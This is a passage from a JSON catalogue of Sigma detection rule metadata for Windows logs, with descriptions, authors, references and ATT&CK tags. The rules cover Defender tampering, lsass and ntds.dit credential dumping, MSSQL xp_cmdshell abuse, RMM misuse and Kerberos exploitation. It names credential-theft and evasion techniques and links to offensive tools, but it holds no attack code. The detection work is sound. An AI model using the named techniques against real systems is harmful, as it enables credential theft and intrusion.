"ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "801bd44f-ceed-4eb6-887c-11544633c0aa", "value": "Windows Defender Configuration Changes" }, { "description": "Detects disabling of the \"Automatic Sample Submission\" feature of Windows Defender.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-06", "falsepositive": [ "Administrator activity (must be investigated)" ], "filename": "win_defender_config_change_sample_submission_consent.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91903aba-1088-42ee-b680-d6d94fe002b0", "value": "Windows Defender Submit Sample Feature Disabled" }, { "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", "meta": { "author": "frack113", "creation_date": "2023-01-12", "falsepositive": [ "Unknown" ], "filename": "win_software_restriction_policies_block.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies", "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml" ], "tags": [ "attack.defense-evasion", "attack.t1072" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "value": "Restricted Software Access By SRP" }, { "description": "Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.\n", "meta": { "author": "Florian Roth (Nextron Systems), Arnim Rupp", "creation_date": "2017-02-19", "falsepositive": [ "Some software piracy tools (key generators, cracks) are classified as hack tools" ], "filename": "win_av_relevant_match.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31", "https://www.nextron-systems.com/?s=antivirus", "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed", "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml" ], "tags": [ "attack.resource-development", "attack.t1588" ] }, "related": [ { "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78bc5783-81d9-4d73-ac97-59f6db4f72a8", "value": "Relevant Anti-Virus Signature Keywords In Application Log" }, { "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-09", "falsepositive": [ "MsMpEng might crash if the \"C:\\\" partition is full" ], "filename": "win_application_msmpeng_crash_error.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_application_msmpeng_crash_error.yml" ], "tags": [ "attack.defense-evasion", "attack.t1211", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "545a5da6-f103-4919-a519-e9aec1026ee4", "value": "Microsoft Malware Protection Engine Crash" }, { "description": "Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-07", "falsepositive": [ "Rare legitimate crashing of the lsass process" ], "filename": "win_werfault_susp_lsass_credential_dump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a18e0862-127b-43ca-be12-1a542c75c7c5", "value": "Potential Credential Dumping Via WER - Application" }, { "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-09", "falsepositive": [ "MsMpEng might crash if the \"C:\\\" partition is full" ], "filename": "win_application_msmpeng_crash_wer.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", "https://technet.microsoft.com/en-us/library/security/4022344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1211", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c82cf5c-090d-4d57-9188-533577631108", "value": "Microsoft Malware Protection Engine Crash - WER" }, { "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate backup operation/creating shadow copies" ], "filename": "win_esent_ntdsutil_abuse.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/mgreen27/status/1558223256704122882", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "value": "Ntdsutil Abuse" }, { "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate backup operation/creating shadow copies" ], "filename": "win_esent_ntdsutil_abuse_susp_location.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/mgreen27/status/1558223256704122882", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "94dc4390-6b7c-4784-8ffc-335334404650", "value": "Dump Ntds.dit To Suspicious Location" }, { "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", "meta": { "author": "Florian Roth (Nextron Systems), Zach Mathis", "creation_date": "2020-01-15", "falsepositive": [ "Unknown" ], "filename": "win_audit_cve.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/DidierStevens/status/1217533958096924676", "https://twitter.com/VM_vivisector/status/1217190929330655232", "https://www.youtube.com/watch?v=ebmW42YYveI", "https://nullsec.us/windows-event-log-audit-cve/", "https://twitter.com/FlemmingRiis/status/1217147415482060800", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml" ], "tags": [ "attack.execution", "attack.t1203", "attack.privilege-escalation", "attack.t1068", "attack.defense-evasion", "attack.t1211", "attack.credential-access", "attack.t1212", "attack.lateral-movement", "attack.t1210", "attack.impact", "attack.t1499.004" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "value": "Audit CVE Event" }, { "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Legitimate enable/disable of the setting", "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "filename": "win_mssql_xp_cmdshell_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml" ], "tags": [ "attack.execution" ] }, "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", "value": "MSSQL XPCmdshell Option Change" }, { "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-13", "falsepositive": [ "Legitimate use of the feature by administrators (rare)" ], "filename": "win_mssql_sp_procoption_set.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "value": "MSSQL SPProcoption Set" }, { "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-13", "falsepositive": [ "Rare legitimate administrative activity" ], "filename": "win_mssql_add_sysadmin_account.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", "value": "MSSQL Add Account To Sysadmin Role" }, { "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-13", "falsepositive": [ "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" ], "filename": "win_mssql_disable_audit_settings.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "value": "MSSQL Disable Audit Settings" }, { "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unknown" ], "filename": "win_mssql_xp_cmdshell_audit_log.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml" ], "tags": [ "attack.execution" ] }, "uuid": "7f103213-a04e-4d59-8261-213dddf22314", "value": "MSSQL XPCmdshell Suspicious Execution" }, { "description": "Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.", "meta": { "author": "j4son", "creation_date": "2023-10-11", "falsepositive": [ "Unknown" ], "filename": "win_mssql_failed_logon_from_external_network.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/", "https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml" ], "tags": [ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d", "value": "MSSQL Server Failed Logon From External Network" }, { "description": "Detects failed logon attempts from clients to MSSQL server.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), j4son", "creation_date": "2023-10-11", "falsepositive": [ "This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them" ], "filename": "win_mssql_failed_logon.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/", "https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml" ], "tags": [ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "218d2855-2bba-4f61-9c85-81d0ea63ac71", "value": "MSSQL Server Failed Logon" }, { "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-09-01", "falsepositive": [ "Legitimate Atera agent installation" ], "filename": "win_software_atera_rmm_agent_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml" ], "tags": [ "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", "value": "Atera Agent Installation" }, { "description": "Detects installation of a remote msi file from web.", "meta": { "author": "Stamatis Chatzimangou", "creation_date": "2022-10-23", "falsepositive": [ "Unknown" ], "filename": "win_msi_install_from_web.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/_st0pp3r_/status/1583922009842802689", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5594e67a-7f92-4a04-b65d-1a42fd824a60", "value": "MSI Installation From Web" }, { "description": "An application has been removed. Check if it is critical.", "meta": { "author": "frack113", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "win_builtin_remove_application.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/msi/event-logging", "https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "570ae5ec-33dc-427c-b815-db86228ad43e", "value": "Application Uninstalled" }, { "description": "Detects MSI package installation from suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-31", "falsepositive": [ "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use." ], "filename": "win_msi_install_from_susp_locations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c7c8aa1c-5aff-408e-828b-998e3620b341", "value": "MSI Installation From Suspicious Locations" }, { "description": "Detects backup catalog deletions", "meta": { "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "creation_date": "2017-05-12", "falsepositive": [ "Unknown" ], "filename": "win_susp_backup_delete.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", "value": "Backup Catalog Deleted" }, { "description": "Detects command execution via ScreenConnect RMM", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use of ScreenConnect" ], "filename": "win_app_remote_access_tools_screenconnect_command_exec.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "076ebe48-cc05-4d8f-9d41-89245cd93a14", "value": "Remote Access Tool - ScreenConnect Command Execution" }, { "description": "Detects file being transferred via ScreenConnect RMM", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use of ScreenConnect" ], "filename": "win_app_remote_access_tools_screenconnect_file_transfer.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13", "value": "Remote Access Tool - ScreenConnect File Transfer" }, { "description": "Detects potential Active Directory enumeration via LDAP", "meta": { "author": "Adeem Mawani", "creation_date": "2021-06-22", "falsepositive": "No established falsepositives", "filename": "win_ldap_recon.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://ipurple.team/2024/07/15/sharphound-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ "attack.discovery", "attack.t1069.002", "attack.t1087.002", "attack.t1482" ] }, "related": [ { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", "value": "Potential Active Directory Reconnaissance/Enumeration Via LDAP" }, { "description": "Detects plugged/unplugged USB devices", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-11-09", "falsepositive": [ "Legitimate administrative activity" ], "filename": "win_usb_device_plugged.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" ], "tags": [ "attack.initial-access", "attack.t1200" ] }, "related": [ { "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "value": "USB Device Plugged" }, { "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Unknown" ], "filename": "win_system_exploit_cve_2021_42287.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", "value": "Potential CVE-2021-42287 Exploitation Attempt" }, { "description": "Detects denied requests by Active Directory Certificate Services.\nExample of these requests denial include issues with permissions on the certificate template or invalid signatures.\n", "meta": { "author": "@SerkinValery", "creation_date": "2024-03-07", "falsepositive": [ "Unknown" ], "filename": "win_system_adcs_enrollment_request_denied.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10)", "https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_certification_authority/win_system_adcs_enrollment_request_denied.yml" ], "tags": [ "attack.credential-access", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "994bfd6d-0a2e-481e-a861-934069fcf5f5", "value": "Active Directory Certificate Services Denied Certificate Enrollment Request" }, { "description": "Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset.\nThis occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default).\nRegistry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-15", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_critical_hive_location_access_bits_cleared.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "value": "Critical Hive In Suspicious Location Access Bits Cleared" }, { "description": "Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.", "meta": { "author": "Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-04-26", "falsepositive": [ "Environments that use NTLMv1" ], "filename": "win_system_lsasrv_ntlmv1.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 